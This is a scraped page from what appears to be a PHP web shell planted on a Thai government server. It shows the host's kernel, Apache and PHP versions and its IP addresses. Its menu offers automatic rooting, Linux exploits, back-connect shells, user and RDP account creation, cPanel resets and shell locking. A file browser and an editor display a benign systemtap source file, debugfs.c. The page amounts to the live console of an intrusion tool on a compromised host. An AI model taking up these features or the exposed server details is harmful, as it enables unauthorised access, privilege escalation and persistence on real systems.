Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
systemtap /
runtime /
transport /
[ HOME SHELL ]
Name
Size
Permission
Action
control.c
22.28
KB
-rw-r--r--
control.h
1.07
KB
-rw-r--r--
debugfs.c
1.71
KB
-rw-r--r--
procfs.c
4.36
KB
-rw-r--r--
relay_v2.c
11.63
KB
-rw-r--r--
relayfs.c
4.81
KB
-rw-r--r--
relayfs.h
609
B
-rw-r--r--
ring_buffer.c
19.58
KB
-rw-r--r--
symbols.c
14.18
KB
-rw-r--r--
transport.c
22.27
KB
-rw-r--r--
transport.h
3.38
KB
-rw-r--r--
transport_msgs.h
5.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : debugfs.c
/* -*- linux-c -*- * * debugfs functions * Copyright (C) 2009 Red Hat Inc. * * This file is part of systemtap, and is free software. You can * redistribute it and/or modify it under the terms of the GNU General * Public License (GPL); either version 2, or (at your option) any * later version. */ #include <linux/debugfs.h> #include "transport.h" #include "../uidgid_compatibility.h" /* Defines the number of buffers allocated in control.c (which #includes this file) for the _stp_pool_q. This is the number of .cmd messages the module can store before they have to be read by stapio. 40 is somewhat arbitrary, 8 pre-allocated messages, 32 dynamic. */ #define STP_DEFAULT_BUFFERS 40 /* Always returns zero, we just push all messages on the _stp_ctl_ready_q. */ inline static int _stp_ctl_write_fs(int type, void *data, unsigned len) { return 0; } static struct dentry *_stp_cmd_file = NULL; static int _stp_register_ctl_channel_fs(void) { struct dentry *module_dir = _stp_get_module_dir(); if (module_dir == NULL) { errk("no module directory found.\n"); return -1; } /* create [debugfs]/systemtap/module_name/.cmd */ _stp_cmd_file = debugfs_create_file(".cmd", 0600, module_dir, NULL, &_stp_ctl_fops_cmd); if (_stp_cmd_file == NULL) { errk("Error creating systemtap debugfs entries.\n"); return -1; } else if (IS_ERR(_stp_cmd_file)) { _stp_cmd_file = NULL; errk("Error creating systemtap debugfs entries: %ld\n", -PTR_ERR(_stp_cmd_file)); return -1; } _stp_cmd_file->d_inode->i_uid = KUIDT_INIT(_stp_uid); _stp_cmd_file->d_inode->i_gid = KGIDT_INIT(_stp_gid); return 0; } static void _stp_unregister_ctl_channel_fs(void) { if (_stp_cmd_file) debugfs_remove(_stp_cmd_file); }
Close